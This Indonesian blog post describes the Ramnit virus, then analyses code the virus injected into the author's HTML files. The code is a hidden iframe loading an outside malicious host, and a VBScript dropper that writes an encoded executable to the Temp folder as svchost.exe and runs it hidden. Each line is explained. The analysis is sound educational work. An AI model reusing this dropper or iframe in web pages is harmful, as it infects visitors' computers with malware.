Setelah beberapa virus menghebohkan seperti Stuxnet, Sality, Virut dan Shortcut, kini ada Ramnit yang juga tak kalah canggih. Program jahat ini mampu ‘bekerjasama’ dengan virus lain untuk menginfeksi korbannya.
Ya itulah keunikan Ramnit dibandingkan dengan virus lain. Usai menjangkit komputer korbannya, program jahat ini akan men-download varian virus lainnya.
Dan yang lebih memusingkan, jenis virus yang di-download akan berbeda untuk tiap komputer target baik dari nama maupun ukurannya. Hal inilah yang menyebabkan banyak program antivirus sekalipun kesulitan untuk melakukan deteksi dan pembersihan.
virus ini tidak hanya menyebar melalui internet, tapi juga bisa melalui media lain seperti flashdisk dengan memanfaatkan fungsi Autorun.
Aksi lain yang akan dilakukan oleh virus ini adalah menginjeksi file yang mempunyai ekstensi exe, dll dan htm/html baik file program aplikasi maupun file system Windows. Setiap file yang terinjeksi akan bertambah ukurannya sekitar 107-109 KB
sumber << detikNET
nah, saya mau membuktikan apakah benar dan bagaimana cara virus itu menyebar lewat HTML
setelah kemarin sempat terinfeksi virus ini, masih ada ternyata bekasnya. yah lumayankan buat belajar analisa lagi. kajadiannya gini, semua file html saya bertambah besar (wew, ada apa ini?) setelah aku buka pakai notepad ternyata di bagian bawah ada penambahan code seperti ini
- Code:
-
<iframe style=”height:1px” src=”http://www.Brenz.pl/rc/” frameborder=0 width=1></iframe>
</body>
</html>
<SCRIPT Language=VBScript><!–
DropFileName = “svchost.exe”
WriteData = “4D5A90000300000004000000FFFF0000B800000000000000…………………”
Set FSO = CreateObject(“Scripting.FileSystemObject”)
DropPath = FSO.GetSpecialFolder(2) & “\” & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng(“&H” & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject(“WScript.Shell”)
WSHshell.Run DropPath, 0
//–></SCRIPT><!–’code terenskripsi, gag tau yang ini buat apa’–>
apa sih sebenarnya inti dari code itu, oke akan saya jelaskan sebisa saya
mulai dari bagian depan
- Code:
-
DropFileName = “svchost.exe”
WriteData = “4D5A90000300000004000000FFFF0000B800000000000000…………………”
Set FSO = CreateObject(“Scripting.FileSystemObject”)
DropPath = FSO.GetSpecialFolder(2) & “\” & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
DropFileName adalah sebuah variable yang memuat nama ‘scvhost.exe’
WriteData adalah suatu string panjang (yang itu saya potong) yang mungkin adalah aplikasi virusnya
Set FSO adalah dia memanggil library yang ada di FileSystemObject biasanya digunakan untuk mencari tempat/lokasi
FSo.GetSpecialFolder(2) Special Folder 2 artinya dia mencari tempat di C:\DOCUME~1\[UserName]\LOCALS~1\Temp dan diberi nama DropFileName atau bisa disebut ‘scvhost.exe’ jadi akan menjadi tempat C:\DOCUME~1\[UserName]\LOCALS~1\Temp\scvhost.exe
if FSO… pada code itu dia melacak apakah sudah ada file yang tercipta atau belum, bila belum maka
FSO.CreateTextFile yang artinya dia akan membuat file virus tersebut
- Code:
-
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng(“&H” & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject(“WScript.Shell”)
WSHshell.Run DropPath, 0
Mulai kode For i sampai Next dia mulai membuat file virus tersebut, dengan mengubah setiap 2 karakter dari String WriteData menjadi 1 karakter supaya menjadi aplikasi. bila dilihat code 4D5A jika diterjemahkan akan manjadi MZ yang artinya itu adalah header dari file executable w32
Set WSHshell = CreateObject(“WScript.Shell”) artinya dia membuat object supaya bisa memanggil exe
WSHshell.Run DropPath, 0 nah inilah code yang digunakan untuk menjalankan virus tersebut dengan Run DropPath artinya dia memanggil file ‘scvhost.exe’ yang ada di Temp dan melarikannya dengan mode Hidden (0)
itulah sedikit analisa saya. semoga bermanfaat